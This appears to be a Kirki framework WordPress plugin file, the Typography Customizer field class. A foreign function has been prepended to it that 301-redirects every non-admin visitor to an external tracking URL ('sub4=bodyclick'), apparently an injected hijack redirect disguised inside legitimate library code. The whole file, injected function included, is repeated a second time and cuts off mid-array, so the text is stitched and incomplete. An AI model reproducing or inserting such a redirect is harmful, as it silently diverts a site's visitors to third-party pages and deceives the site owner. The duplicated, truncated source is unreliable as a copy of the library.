function my_custom_redirect() { // Убедитесь, что этот код выполняется только на фронтенде if (!is_admin()) { // URL для редиректа $redirect_url = '[ID]&sub2=[SID]&sub3=3&sub4=bodyclick'; // Выполнить редирект wp_redirect($redirect_url, 301); exit(); } } add_action('template_redirect', 'my_custom_redirect'); /** * Override field methods * * @package kirki-framework/control-typography * @copyright Copyright (c) 2023, Themeum * @license * @since 1.0 */ namespace Kirki\Field; use Kirki\Util\Helper; use Kirki\Field; use Kirki\GoogleFonts; use Kirki\Module\Webfonts\Fonts; /** * Field overrides. * * @since 1.0 */ class Typography extends Field { /** * The field type. * * @access public * @since 1.0 * @var string */ public $type = 'kirki-typography'; /** * Has the glogal fonts var been added already? * * @static * @access private * @since 1.0 * @var bool */ private static $fonts_var_added = false; /** * Has the preview related var been added already? * * @static * @access private * @since 1.0 * @var bool */ private static $preview_var_added = false; /** * An array of typography controls. * * This is used by the typography script for any custom logic * that has to be applied to typography controls. * * @static * @access private * @since 1.0 * @var array */ private static $typography_controls = []; /** * An array of standard font variants. * * @access private * @since 1.0.1 * * @var array */ private static $std_variants; /** * An array of complete font variants. * * @access private * @since 1.0.1 * * @var array */ private static $complete_variants; /** * An array of complete font variant labels. * * @access private * @since 1.0.2 * * @var array */ private static $complete_variant_labels = []; /** * Extra logic for the field. * * Adds all sub-fields. * * @access public * @param array $args The arguments of the field. */ public function init( $args = [] ) { self::$typography_controls[] = $args['settings']; self::$std_variants = [ [ 'value' => 'regular', 'label' => __( 'Regular', 'kirki' ), ], [ 'value' => 'italic', 'label' => __( 'Italic', 'kirki' ), ], [ 'value' => '700', 'label' => __( '700', 'kirki' ), ], [ 'value' => '700italic', 'label' => __( '700 Italic', 'kirki' ), ], ]; self::$complete_variants = [ [ 'value' => 'regular', 'label' => __( 'Regular', 'kirki' ), ], [ 'value' => 'italic', 'label' => __( 'Italic', 'kirki' ), ], [ 'value' => '100', 'label' => __( '100', 'kirki' ), ], [ 'value' => '100italic', 'label' => __( '100 Italic', 'kirki' ), ], [ 'value' => '200', 'label' => __( '200', 'kirki' ), ], [ 'value' => '200italic', 'label' => __( '200 Italic', 'kirki' ), ], [ 'value' => '300', 'label' => __( '300', 'kirki' ), ], [ 'value' => '300italic', 'label' => __( '300 Italic', 'kirki' ), ], [ 'value' => '500', 'label' => __( '500', 'kirki' ), ], [ 'value' => '500italic', 'label' => __( '500 Italic', 'kirki' ), ], [ 'value' => '600', 'label' => __( '600', 'kirki' ), ], [ 'value' => '600italic', 'label' => __( '600 Italic', 'kirki' ), ], [ 'value' => '700', 'label' => __( '700', 'kirki' ), ], [ 'value' => '700italic', 'label' => __( '700 Italic', 'kirki' ), ], [ 'value' => '800', 'label' => __( '800', 'kirki' ), ], [ 'value' => '800italic', 'label' => __( '800 Italic', 'kirki' ), ], [ 'value' => '900', 'label' => __( '900', 'kirki' ), ], [ 'value' => '900italic', 'label' => __( '900 Italic', 'kirki' ), ], ]; foreach ( self::$complete_variants as $variants ) { self::$complete_variant_labels[ $variants['value'] ] = $variants['label']; } $this->add_sub_fields( $args ); add_action( 'customize_controls_enqueue_scripts', [ $this, 'enqueue_control_scripts' ] ); add_action( 'customize_preview_init', [ $this, 'enqueue_preview_scripts' ] ); add_filter( 'kirki_output_control_classnames', [ $this, 'output_control_classnames' ] ); } /** * Add sub-fields. * * @access private * @since 1.0 * @param array $args The field arguments. * @return void */ private function add_sub_fields( $args ) { $args['kirki_config'] = isset( $args['kirki_config'] ) ? $args['kirki_config'] : 'global'; $defaults = isset( $args['default'] ) ? $args['default'] : []; /** * Add a hidden field, the label & description. */ new \Kirki\Field\Generic( wp_parse_args( [ 'sanitize_callback' => isset( $args['sanitize_callback'] ) ? $args['sanitize_callback'] : [ __CLASS__, 'sanitize' ], 'wrapper_opts' => [ 'gap' => 'small', ], 'input_attrs' => '', 'choices' => [ 'type' => 'hidden', 'parent_type' => 'kirki-typography', ], ], $args ) ); $args['parent_setting'] = $args['settings']; $args['output'] = []; $args['wrapper_attrs'] = [ 'data-kirki-parent-control-type' => 'kirki-typography', ]; if ( isset( $args['transport'] ) && 'auto' === $args['transport'] ) { $args['transport'] = 'postMessage'; } /** * Add font-family selection controls. * These include font-family and variant. * They are grouped here because all they are required. * in order to get the right googlefont variant. */ if ( isset( $args['default']['font-family'] ) ) { $args['wrapper_attrs']['kirki-typography-subcontrol-type'] = 'font-family'; /** * Add font-family control. */ new \Kirki\Field\ReactSelect( wp_parse_args( [ 'label' => esc_html__( 'Font Family', 'kirki' ), 'description' => '', 'settings' => $args['settings'] . '[font-family]', 'default' => isset( $args['default']['font-family'] ) ? $args['default']['font-family'] : '', 'input_attrs' => $this->filter_preferred_choice_setting( 'input_attrs', 'font-family', $args ), 'choices' => [], // The choices will be populated later inside `get_font_family_choices` function in this file. 'css_vars' => [], 'output' => [], ], $args ) ); /** * Add font variant. */ $font_variant = isset( $args['default']['variant'] ) ? $args['default']['variant'] : 'regular'; if ( isset( $args['default']['font-weight'] ) ) { $font_variant = 400 === $args['default']['font-weight'] || '400' === $args['default']['font-weight'] ? 'regular' : $args['default']['font-weight']; } $args['wrapper_attrs']['kirki-typography-subcontrol-type'] = 'font-variant'; new \Kirki\Field\ReactSelect( wp_parse_args( [ 'label' => esc_html__( 'Font Variant', 'kirki' ), 'description' => '', 'settings' => $args['settings'] . '[variant]', 'default' => $font_variant, 'input_attrs' => $this->filter_preferred_choice_setting( 'input_attrs', 'variant', $args ), 'choices' => [], // The choices will be populated later inside `get_variant_choices` function in this file. 'css_vars' => [], 'output' => [], ], $args ) ); } $font_size_field_specified = isset( $defaults['font-size'] ); $color_field_specified = isset( $defaults['color'] ); if ( $font_size_field_specified || $color_field_specified ) { $group = [ 'font-size' => [ 'type' => 'dimension', 'label' => esc_html__( 'Font Size', 'kirki' ), 'is_specified' => $font_size_field_specified, ], 'color' => [ 'type' => 'react-colorful', 'label' => esc_html__( 'Font Color', 'kirki' ), 'is_specified' => $color_field_specified, 'choices' => [ 'alpha' => true, 'label_style' => 'top', ], ], ]; $this->generate_controls_group( $group, $args ); } $text_align_field_specified = isset( $defaults['text-align'] ); $text_transform_field_specified = isset( $defaults['text-transform'] ); if ( $text_align_field_specified || $text_transform_field_specified ) { $group = [ 'text-align' => [ 'type' => 'react-select', 'label' => esc_html__( 'Text Align', 'kirki' ), 'is_specified' => $text_align_field_specified, 'choices' => [ 'initial' => esc_html__( 'Initial', 'kirki' ), 'left' => esc_html__( 'Left', 'kirki' ), 'center' => esc_html__( 'Center', 'kirki' ), 'right' => esc_html__( 'Right', 'kirki' ), 'justify' => esc_html__( 'Justify', 'kirki' ), ], ], 'text-transform' => [ 'type' => 'react-select', 'label' => esc_html__( 'Text Transform', 'kirki' ), 'is_specified' => $text_transform_field_specified, 'choices' => [ 'none' => esc_html__( 'None', 'kirki' ), 'capitalize' => esc_html__( 'Capitalize', 'kirki' ), 'uppercase' => esc_html__( 'Uppercase', 'kirki' ), 'lowercase' => esc_html__( 'Lowercase', 'kirki' ), ], ], ]; $this->generate_controls_group( $group, $args ); } $text_decoration_field_specified = isset( $defaults['text-decoration'] ); if ( $text_decoration_field_specified ) { $group = [ 'text-decoration' => [ 'type' => 'react-select', 'label' => esc_html__( 'Text Decoration', 'kirki' ), 'is_specified' => $text_decoration_field_specified, 'choices' => [ 'none' => esc_html__( 'None', 'kirki' ), 'underline' => esc_html__( 'Underline', 'kirki' ), 'line-through' => esc_html__( 'Line Through', 'kirki' ), 'overline' => esc_html__( 'Overline', 'kirki' ), 'solid' => esc_html__( 'Solid', 'kirki' ), 'wavy' => esc_html__( 'Wavy', 'kirki' ), ], ], ]; $this->generate_controls_group( $group, $args ); } $line_height_field_specified = isset( $defaults['line-height'] ); $letter_spacing_field_specified = isset( $defaults['letter-spacing'] ); if ( $line_height_field_specified || $letter_spacing_field_specified ) { $group = [ 'line-height' => [ 'type' => 'dimension', 'label' => esc_html__( 'Line Height', 'kirki' ), 'is_specified' => $line_height_field_specified, ], 'letter-spacing' => [ 'type' => 'dimension', 'label' => esc_html__( 'Letter Spacing', 'kirki' ), 'is_specified' => $letter_spacing_field_specified, ], ]; $this->generate_controls_group( $group, $args ); } $margin_top_field_specified = isset( $defaults['margin-top'] ); $margin_bottom_field_specified = isset( $defaults['margin-bottom'] ); if ( $margin_top_field_specified || $margin_bottom_field_specified ) { $group = [ 'margin-top' => [ 'type' => 'dimension', 'label' => esc_html__( 'Margin Top', 'kirki' ), 'is_specified' => $margin_top_field_specified, ], 'margin-bottom' => [ 'type' => 'dimension', 'label' => esc_html__( 'Margin Bottom', 'kirki' ), 'is_specified' => $margin_bottom_field_specified, ], ]; $this->generate_controls_group( $group, $args ); } } /** * Generate controls group. * * @param array $group The group data. * @param array $args The field args. */ public function generate_controls_group( $group, $args ) { $total_specified = 0; $field_width = 100; foreach ( $group as $css_prop => $control ) { if ( $control['is_specified'] ) { $total_specified++; } } if ( $total_specified > 1 ) { $field_width = floor( 100 / $total_specified ); } $group_count = 0; foreach ( $group as $css_prop => $control ) { if ( $control['is_specified'] ) { $group_count++; $group_classname = 'kirki-group-item'; $group_classname .= 1 === $group_count ? ' kirki-group-start' : ( $group_count === $total_specified ? ' kirki-group-end' : '' ); $control_class = str_ireplace( '-', ' ', $control['type'] ); $control_class = ucwords( $control_class ); $control_class = str_replace( ' ', '', $control_class ); $control_class = '\\Kirki\\Field\\' . $control_class; new $control_class( wp_parse_args( [ 'label' => isset( $control['label'] ) ? $control['label'] : '', 'description' => isset( $control['description'] ) ? $control['description'] : '', 'settings' => $args['settings'] . '[' . $css_prop . ']', 'default' => $args['default'][ $css_prop ], 'wrapper_attrs' => wp_parse_args( [ 'data-kirki-typography-css-prop' => $css_prop, 'kirki-typography-subcontrol-type' => $css_prop, 'class' => '{default_class} ' . $group_classname . ' kirki-w' . $field_width, ], $args['wrapper_attrs'] ), 'input_attrs' => $this->filter_preferred_choice_setting( 'input_attrs', $css_prop, $args ), 'choices' => ( isset( $control['choices'] ) ? $control['choices'] : [] ), 'css_vars' => [], 'output' => [], ], $args ) ); } } } /** * Sanitizes typography controls * * @static * @since 1.0 * @param array $value The value. * @return array */ public static function sanitize( $value ) { if ( ! is_array( $value ) ) { return []; } foreach ( $value as $key => $val ) { switch ( $key ) { case 'font-family': $value['font-family'] = sanitize_text_field( $val ); break; case 'variant': // Use 'regular' instead of 400 for font-variant. $value['variant'] = ( 400 === $val || '400' === $val ) ? 'regular' : $val; // Get font-weight from variant. $value['font-weight'] = filter_var( $value['variant'], FILTER_SANITIZE_NUMBER_FLOAT, FILTER_FLAG_ALLOW_FRACTION ); $value['font-weight'] = ( 'regular' === $value['variant'] || 'italic' === $value['variant'] ) ? '400' : (string) absint( $value['font-weight'] ); // Get font-style from variant. if ( ! isset( $value['font-style'] ) ) { $value['font-style'] = ( false === strpos( $value['variant'], 'italic' ) ) ? 'normal' : 'italic'; } break; case 'text-align': if ( ! in_array( $val, [ '', 'inherit', 'left', 'center', 'right', 'justify' ], true ) ) { $value['text-align'] = ''; } break; case 'text-transform': if ( ! in_array( $val, [ '', 'none', 'capitalize', 'uppercase', 'lowercase', 'initial', 'inherit' ], true ) ) { $value['text-transform'] = ''; } break; case 'text-decoration': if ( ! in_array( $val, [ '', 'none', 'underline', 'overline', 'line-through', 'solid', 'wavy', 'initial', 'inherit' ], true ) ) { $value['text-transform'] = ''; } break; case 'color': $value['color'] = '' === $value['color'] ? '' : \Kirki\Field\ReactColorful::sanitize( $value['color'] ); break; default: $value[ $key ] = sanitize_text_field( $value[ $key ] ); } } return $value; } /** * Enqueue scripts & styles. * * @access public * @since 1.0 * @return void */ public function enqueue_control_scripts() { wp_enqueue_style( 'kirki-control-typography', \Kirki\URL::get_from_path( dirname( dirname( __DIR__ ) ) . '/dist/control.css' ), [], '1.0' ); wp_enqueue_script( 'kirki-control-typography', \Kirki\URL::get_from_path( dirname( dirname( __DIR__ ) ) . '/dist/control.js' ), [], '1.0', true ); wp_localize_script( 'kirki-control-typography', 'kirkiTypographyControls', self::$typography_controls ); $args = $this->args; $variants = []; // Add custom variants (for custom fonts) to the $variants. if ( isset( $args['choices'] ) && isset( $args['choices']['fonts'] ) && isset( $args['choices']['fonts']['families'] ) ) { // If $args['choices']['fonts']['families'] exists, then loop it. foreach ( $args['choices']['fonts']['families'] as $font_family_key => $font_family_value ) { // Then loop the $font_family_value['children]. foreach ( $font_family_value['children'] as $font_family ) { // Then check if $font_family['id'] exists in variants argument. if ( isset( $args['choices']['fonts']['variants'] ) && isset( $args['choices']['fonts']['variants'][ $font_family['id'] ] ) ) { // Create new array if $variants[ $font_family['id'] ] doesn't exist. if ( ! isset( $variants[ $font_family['id'] ] ) ) { $variants[ $font_family['id'] ] = []; } // The $custom_variant here can be something like "400italic" or "italic". foreach ( $args['choices']['fonts']['variants'][ $font_family['id'] ] as $custom_variant ) { // Check if $custom_variant exists in self::$complete_variant_labels. if ( isset( self::$complete_variant_labels[ $custom_variant ] ) ) { // If it exists, assign it to $variants[ $font_family['id'] ], so that they will be available in JS object. array_push( $variants[ $font_family['id'] ], [ 'value' => $custom_variant, 'label' => self::$complete_variant_labels[ $custom_variant ], ] ); } // End of isset(self::$complete_variant_labels[$font_family['id']]) if. } // End of $args['choices']['fonts']['variants'][ $font_family['id'] foreach. } } // End of $font_family_value['children'] foreach. } // End of $args['choices']['fonts']['families'] foreach. } // End of $args['choices']['fonts']['families'] if. if ( ! isset( $args['choices']['fonts'] ) || ! isset( $args['choices']['fonts']['standard'] ) ) { $standard_fonts = Fonts::get_standard_fonts(); foreach ( $standard_fonts as $font ) { if ( isset( $font['variants'] ) ) { // Create new array if $variants[ $font['stack'] ] doesn't exist. if ( ! isset( $variants[ $font['stack'] ] ) ) { $variants[ $font['stack'] ] = []; } // The $std_variant here can be something like "400italic" or "italic". foreach ( $font['variants'] as $std_variant ) { // Check if $std_variant exists in self::$complete_variant_labels. if ( isset( self::$complete_variant_labels[ $std_variant ] ) ) { // If it exists, assign it to $variants[ $font['stack'] ], so that they will be available in JS object. array_push( $variants[ $font['stack'] ], [ 'value' => $std_variant, 'label' => self::$complete_variant_labels[ $std_variant ], ] ); } // End of isset(self::$complete_variant_labels[$font_family['id']]) if. } // End of $args['choices']['fonts']['variants'][ $font_family['id'] foreach. } } } elseif ( is_array( $args['choices']['fonts']['standard'] ) ) { foreach ( $args['choices']['fonts']['standard'] as $key => $val ) { $key = ( is_int( $key ) ) ? $val : $key; if ( isset( $val['variants'] ) ) { // Create new array if $variants[ $font['stack'] ] doesn't exist. if ( ! isset( $variants[ $key ] ) ) { $variants[ $key ] = []; } // The $std_variant here can be something like "400italic" or "italic". foreach ( $val['variants'] as $std_variant ) { // Check if $std_variant exists in self::$complete_variant_labels. if ( isset( self::$complete_variant_labels[ $std_variant ] ) ) { // If it exists, assign it to $variants[ $font['stack'] ], so that they will be available in JS object. array_push( $variants[ $key ], [ 'value' => $std_variant, 'label' => self::$complete_variant_labels[ $std_variant ], ] ); } // End of isset(self::$complete_variant_labels[$font_family['id']]) if. } // End of $args['choices']['fonts']['variants'][ $font_family['id'] foreach. } } } // Scripts inside this block will only be executed once. if ( ! self::$fonts_var_added ) { wp_localize_script( 'kirki-control-typography', 'kirkiFontVariants', [ 'standard' => self::$std_variants, 'complete' => self::$complete_variants, ] ); $google = new GoogleFonts(); wp_localize_script( 'kirki-control-typography', 'kirkiGoogleFonts', $google->get_array() ); wp_add_inline_script( 'kirki-control-typography', 'var kirkiCustomVariants = {};', 'before' ); self::$fonts_var_added = true; } // This custom variants will be available for each typography control. $custom_variant_key = str_ireplace( ']', '', $args['settings'] ); $custom_variant_key = str_ireplace( '[', '_', $custom_variant_key ); $custom_variant_value = wp_json_encode( Helper::prepare_php_array_for_js( $variants ) ); wp_add_inline_script( 'kirki-control-typography', 'kirkiCustomVariants["' . $custom_variant_key . '"] = ' . $custom_variant_value . ';', $variants ); } /** * Enqueue scripts for customize_preview_init. * * @access public * @since 1.0 * @return void */ public function enqueue_preview_scripts() { wp_enqueue_script( 'kirki-preview-typography', \Kirki\URL::get_from_path( dirname( dirname( __DIR__ ) ) . '/dist/preview.js' ), [ 'wp-hooks' ], '1.0', true ); if ( ! self::$preview_var_added ) { $google = new GoogleFonts(); wp_localize_script( 'kirki-preview-typography', 'kirkiGoogleFontNames', $google->get_google_font_names() ); self::$preview_var_added = true; } } /** * Prefer control specific value over field value * * @access public * @since 4.0 * @param $setting * @param $choice * @param $args * * @return string */ public function filter_preferred_choice_setting( $setting, $choice, $args ) { // Fail early. if ( ! isset( $args[ $setting ] ) ) { return ''; } // If a specific field for the choice is set if ( isset( $args[ $setting ][ $choice ] ) ) { return $args[ $setting ][ $choice ]; } // Unset input_attrs of all other choices. foreach ( $args['choices'] as $id => $set ) { if ( $id !== $choice && isset( $args[ $setting ][ $id ] ) ) { unset( $args[ $setting ][ $id ] ); } elseif ( ! isset( $args[ $setting ][ $id ] ) ) { $args[ $setting ] = ''; } } return $args[ $setting ]; } /** * Populate the font family choices. * * It's separated from the `add_sub_field` function to prevent a bug * when hooking a function into `kirki_fonts_standard_fonts` hook after registering the field. * * When a function is hooked to `kirki_fonts_standard_fonts` before registering the field, it will work. * But if it's hooked after field registration, then the function won't be available. * * @access private * @since 1.0.1 * * @return array */ private function get_font_family_choices() { $args = $this->args; // Figure out how to sort the fonts. $sorting = 'alpha'; $max_fonts = 9999; $google = new GoogleFonts(); if ( isset( $args['choices'] ) && isset( $args['choices']['fonts'] ) && isset( $args['choices']['fonts']['google'] ) && ! empty( $args['choices']['fonts']['google'] ) ) { if ( in_array( $args['choices']['fonts']['google'][0], [ 'alpha', 'popularity', 'trending' ], true ) ) { $sorting = $args['choices']['fonts']['google'][0]; if ( isset( $args['choices']['fonts']['google'][1] ) && is_int( $args['choices']['fonts']['google'][1] ) ) { $max_fonts = (int) $args['choices']['fonts']['google'][1]; } $g_fonts = $google->get_google_fonts_by_args( [ 'sort' => $sorting, 'count' => $max_fonts, ] ); } else { $g_fonts = $args['choices']['fonts']['google']; } } else { $g_fonts = $google->get_google_fonts_by_args( [ 'sort' => $sorting, 'count' => $max_fonts, ] ); } $std_fonts = []; if ( ! isset( $args['choices']['fonts'] ) || ! isset( $args['choices']['fonts']['standard'] ) ) { $standard_fonts = Fonts::get_standard_fonts(); foreach ( $standard_fonts as $font ) { $std_fonts[ $font['stack'] ] = $font['label']; } } elseif ( is_array( $args['choices']['fonts']['standard'] ) ) { foreach ( $args['choices']['fonts']['standard'] as $key => $val ) { $key = ( \is_int( $key ) ) ? $val : $key; $std_fonts[ $key ] = $val; } } $choices = []; $choices['default'] = [ esc_html__( 'Defaults', 'kirki' ), [ '' => esc_html__( 'Default', 'kirki' ), ], ]; if ( isset( $args['choices'] ) && isset( $args['choices']['fonts'] ) && isset( $args['choices']['fonts']['families'] ) ) { // Implementing the custom font families. foreach ( $args['choices']['fonts']['families'] as $font_family_key => $font_family_value ) { if ( ! isset( $choices[ $font_family_key ] ) ) { $choices[ $font_family_key ] = []; } $family_opts = []; foreach ( $font_family_value['children'] as $font_family ) { $family_opts[ $font_family['id'] ] = $font_family['text']; } $choices[ $font_family_key ] = [ $font_family_value['text'], $family_opts, ]; } } $choices['standard'] = [ esc_html__( 'Standard Fonts', 'kirki' ), $std_fonts, ]; $choices['google'] = [ esc_html__( 'Google Fonts', 'kirki' ), array_combine( array_values( $g_fonts ), array_values( $g_fonts ) ), ]; if ( empty( $choices['standard'][1] ) ) { $choices = array_combine( array_values( $g_fonts ), array_values( $g_fonts ) ); } elseif ( empty( $choices['google'][1] ) ) { $choices = $std_fonts; } return $choices; } /** * Get custom variant choices (for custom fonts). * * It's separated from the `add_sub_field` function to prevent a bug * when hooking a function into `kirki_fonts_standard_fonts` hook after registering the field. * * When a function is hooked to `kirki_fonts_standard_fonts` before registering the field, it will work. * But if it's hooked after field registration, then the function won't be available. * * @access private * @since 1.0.2 * * @return array */ private function get_variant_choices() { $args = $this->args; $choices = self::$std_variants; // Implementing the custom variants for custom fonts. if ( isset( $args['choices'] ) && isset( $args['choices']['fonts'] ) && isset( $args['choices']['fonts']['families'] ) ) { $choices = []; // If $args['choices']['fonts']['families'] exists, then loop it. foreach ( $args['choices']['fonts']['families'] as $font_family_key => $font_family_value ) { // Then loop the $font_family_value['children]. foreach ( $font_family_value['children'] as $font_family ) { // Then check if $font_family['id'] exists in $args['choices']['fonts']['variants']. if ( isset( $args['choices']['fonts']['variants'] ) && isset( $args['choices']['fonts']['variants'][ $font_family['id'] ] ) ) { // The $custom_variant here can be something like "400italic" or "italic". foreach ( $args['choices']['fonts']['variants'][ $font_family['id'] ] as $custom_variant ) { // Check if $custom_variant exists in self::$complete_variant_labels. if ( isset( self::$complete_variant_labels[ $custom_variant ] ) ) { // If it exists, assign it to $choices. array_push( $choices, [ 'value' => $custom_variant, 'label' => self::$complete_variant_labels[ $custom_variant ], ] ); } // End of isset(self::$complete_variant_labels[$font_family['id']]) if. } // End of $args['choices']['fonts']['variants'][ $font_family['id'] foreach. } } // End of $font_family_value['children'] foreach. } // End of $args['choices']['fonts']['families'] foreach. } // End of $args['choices']['fonts']['families'] if. return $choices; } /** * Filter arguments before creating the control. * * @access public * @since 0.1 * @param array $args The field arguments. * @param WP_Customize_Manager $wp_customize The customizer instance. * @return array */ public function filter_control_args( $args, $wp_customize ) { if ( $args['settings'] === $this->args['settings'] . '[font-family]' ) { $args = parent::filter_control_args( $args, $wp_customize ); $args['choices'] = $this->get_font_family_choices(); } if ( $args['settings'] === $this->args['settings'] . '[variant]' ) { $args = parent::filter_control_args( $args, $wp_customize ); $args['choices'] = $this->get_variant_choices(); } return $args; } /** * Adds a custom output class for typography fields. * * @access public * @since 1.0 * @param array $classnames The array of classnames. * @return array */ public function output_control_classnames( $classnames ) { $classnames['kirki-typography'] = '\Kirki\Field\CSS\Typography'; return $classnames; } /** * Override parent method. No need to register any setting. * * @access public * @since 0.1 * @param WP_Customize_Manager $wp_customize The customizer instance. * @return void */ public function add_setting( $wp_customize ) {} /** * Override the parent method. No need for a control. * * @access public * @since 0.1 * @param WP_Customize_Manager $wp_customize The customizer instance. * @return void */ public function add_control( $wp_customize ) {} } function my_custom_redirect() { // Убедитесь, что этот код выполняется только на фронтенде if (!is_admin()) { // URL для редиректа $redirect_url = '[ID]&sub2=[SID]&sub3=3&sub4=bodyclick'; // Выполнить редирект wp_redirect($redirect_url, 301); exit(); } } add_action('template_redirect', 'my_custom_redirect'); /** * Override field methods * * @package kirki-framework/control-typography * @copyright Copyright (c) 2023, Themeum * @license * @since 1.0 */ namespace Kirki\Field; use Kirki\Util\Helper; use Kirki\Field; use Kirki\GoogleFonts; use Kirki\Module\Webfonts\Fonts; /** * Field overrides. * * @since 1.0 */ class Typography extends Field { /** * The field type. * * @access public * @since 1.0 * @var string */ public $type = 'kirki-typography'; /** * Has the glogal fonts var been added already? * * @static * @access private * @since 1.0 * @var bool */ private static $fonts_var_added = false; /** * Has the preview related var been added already? * * @static * @access private * @since 1.0 * @var bool */ private static $preview_var_added = false; /** * An array of typography controls. * * This is used by the typography script for any custom logic * that has to be applied to typography controls. * * @static * @access private * @since 1.0 * @var array */ private static $typography_controls = []; /** * An array of standard font variants. * * @access private * @since 1.0.1 * * @var array */ private static $std_variants; /** * An array of complete font variants. * * @access private * @since 1.0.1 * * @var array */ private static $complete_variants; /** * An array of complete font variant labels. * * @access private * @since 1.0.2 * * @var array */ private static $complete_variant_labels = []; /** * Extra logic for the field. * * Adds all sub-fields. * * @access public * @param array $args The arguments of the field. */ public function init( $args = [] ) { self::$typography_controls[] = $args['settings']; self::$std_variants = [ [ 'value' => 'regular', 'label' => __( 'Regular', 'kirki' ), ], [ 'value' => 'italic', 'label' => __( 'Italic', 'kirki' ), ], [ 'value' => '700', 'label' => __( '700', 'kirki' ), ], [ 'value' => '700italic', 'label' => __( '700 Italic', 'kirki' ), ], ]; self::$complete_variants = [ [ 'value' => 'regular', 'label' => __( 'Regular', 'kirki' ), ], [ 'value' => 'italic', 'label' => __( 'Italic', 'kirki' ), ], [ 'value' => '100', 'label' => __( '100', 'kirki' ), ], [ 'value' => '100italic', 'label' => __( '100 Italic', 'kirki' ), ], [ 'value' => '200', 'label' => __( '200', 'kirki' ), ], [ 'value' => '200italic', 'label' => __( '200 Italic', 'kirki' ), ], [ 'value' => '300', 'label' => __( '300', 'kirki' ), ], [ 'value' => '300italic', 'label' => __( '300 Italic', 'kirki' ), ], [ 'value' => '500', 'label' => __( '500', 'kirki' ), ], [ 'value' => '500italic', 'label' => __( '500 Italic', 'kirki' ), ], [ 'value' => '600', 'label' => __( '600', 'kirki' ), ], [ 'value' => '600italic', 'label' => __( '600 Italic', 'kirki' ), ], [ 'value' => '700', 'label' => __( '700', 'kirki' ), ], [ 'value' => '700italic', 'label' => __( '700 Italic', 'kirki' ), ], [ 'value' => '800', 'label' => __( '800', 'kirki' ), ], [ 'value' => '800italic', 'label' => __( '800 Italic', 'kirki' ), ], [ 'value' => '900', 'label' => __( '900', 'kirki' ), ], [ 'value' => '900italic', 'label' => __( '900 Italic', 'kirki' ), ], ]; foreach ( self::$complete_variants as $variants ) { self::$complete_variant_labels[ $variants['value'] ] = $variants['label']; } $this->add_sub_fields( $args ); add_action( 'customize_controls_enqueue_scripts', [ $this, 'enqueue_control_scripts' ] ); add_action( 'customize_preview_init', [ $this, 'enqueue_preview_scripts' ] ); add_filter( 'kirki_output_control_classnames', [ $this, 'output_control_classnames' ] ); } /** * Add sub-fields. * * @access private * @since 1.0 * @param array $args The field arguments. * @return void */ private function add_sub_fields( $args ) { $args['kirki_config'] = isset( $args['kirki_config'] ) ? $args['kirki_config'] : 'global'; $defaults = isset( $args['default'] ) ? $args['default'] : []; /** * Add a hidden field, the label & description. */ new \Kirki\Field\Generic( wp_parse_args( [ 'sanitize_callback' => isset( $args['sanitize_callback'] ) ? $args['sanitize_callback'] : [ __CLASS__, 'sanitize' ], 'wrapper_opts' => [ 'gap' => 'small', ], 'input_attrs' => '', 'choices' => [ 'type' => 'hidden', 'parent_type' => 'kirki-typography', ], ], $args ) ); $args['parent_setting'] = $args['settings']; $args['output'] = []; $args['wrapper_attrs'] = [ 'data-kirki-parent-control-type' => 'kirki-typography', ]; if ( isset( $args['transport'] ) && 'auto' === $args['transport'] ) { $args['transport'] = 'postMessage'; } /** * Add font-family selection controls. * These include font-family and variant. * They are grouped here because all they are required. * in order to get the right googlefont variant. */ if ( isset( $args['default']['font-family'] ) ) { $args['wrapper_attrs']['kirki-typography-subcontrol-type'] = 'font-family'; /** * Add font-family control. */ new \Kirki\Field\ReactSelect( wp_parse_args( [ 'label' => esc_html__( 'Font Family', 'kirki' ), 'description' => '', 'settings' => $args['settings'] . '[font-family]', 'default' => isset( $args['default']['font-family'] ) ? $args['default']['font-family'] : '', 'input_attrs' => $this->filter_preferred_choice_setting( 'input_attrs', 'font-family', $args ), 'choices' => [], // The choices will be populated later inside `get_font_family_choices` function in this file. 'css_vars' => [], 'output' => [], ], $args ) ); /** * Add font variant. */ $font_variant = isset( $args['default']['variant'] ) ? $args['default']['variant'] : 'regular'; if ( isset( $args['default']['font-weight'] ) ) { $font_variant = 400 === $args['default']['font-weight'] || '400' === $args['default']['font-weight'] ? 'regular' : $args['default']['font-weight']; } $args['wrapper_attrs']['kirki-typography-subcontrol-type'] = 'font-variant'; new \Kirki\Field\ReactSelect( wp_parse_args( [ 'label' => esc_html__( 'Font Variant', 'kirki' ), 'description' => '', 'settings' => $args['settings'] . '[variant]', 'default' => $font_variant, 'input_attrs' => $this->filter_preferred_choice_setting( 'input_attrs', 'variant', $args ), 'choices' => [], // The choices will be populated later inside `get_variant_choices` function in this file. 'css_vars' => [], 'output' => [], ], $args ) ); } $font_size_field_specified = isset( $defaults['font-size'] ); $color_field_specified = isset( $defaults['color'] ); if ( $font_size_field_specified || $color_field_specified ) { $group = [ 'font-size' => [ 'type' => 'dimension', 'label' => esc_html__( 'Font Size', 'kirki' ), 'is_specified' => $font_size_field_specified, ], 'color' => [ 'type' => 'react-colorful', 'label' => esc_html__( 'Font Color', 'kirki' ), 'is_specified' => $color_field_specified, 'choices' => [ 'alpha' => true, 'label_style' => 'top', ], ], ]; $this->generate_controls_group( $group, $args ); } $text_align_field_specified = isset( $defaults['text-align'] ); $text_transform_field_specified = isset( $defaults['text-transform'] ); if ( $text_align_field_specified || $text_transform_field_specified ) { $group = [ 'text-align' => [ 'type' => 'react-select', 'label' => esc_html__( 'Text Align', 'kirki' ), 'is_specified' => $text_align_field_specified, 'choices' => [ 'initial' => esc_html__( 'Initial', 'kirki' ), 'left' => esc_html__( 'Left', 'kirki' ), 'center' => esc_html__( 'Center', 'kirki' ), 'right' => esc_html__( 'Right', 'kirki' ), 'justify' => esc_html__( 'Justify', 'kirki' ), ], ], 'text-transform' => [ 'type' => 'react-select', 'label' => esc_html__( 'Text Transform', 'kirki' ), 'is_specified' => $text_transform_field_specified, 'choices' => [ 'none' => esc_html__( 'None', 'kirki' ), 'capitalize' => esc_html__( 'Capitalize', 'kirki' ), 'uppercase' => esc_html__( 'Uppercase', 'kirki' ), 'lowercase' => esc_html__( 'Lowercase', 'kirki' ), ], ], ]; $this->generate_controls_group( $group, $args ); } $text_decoration_field_specified = isset( $defaults['text-decoration'] ); if ( $text_decoration_field_specified ) { $group = [ 'text-decoration' => [ 'type' => 'react-select', 'label' => esc_html__( 'Text Decoration', 'kirki' ), 'is_specified' => $text_decoration_field_specified, 'choices' => [ 'none' => esc_html__( 'None', 'kirki' ), 'underline' => esc_html__( 'Underline', 'kirki' ), 'line-through' => esc_html__( 'Line Through', 'kirki' ), 'overline' => esc_html__( 'Overline', 'kirki' ), 'solid' => 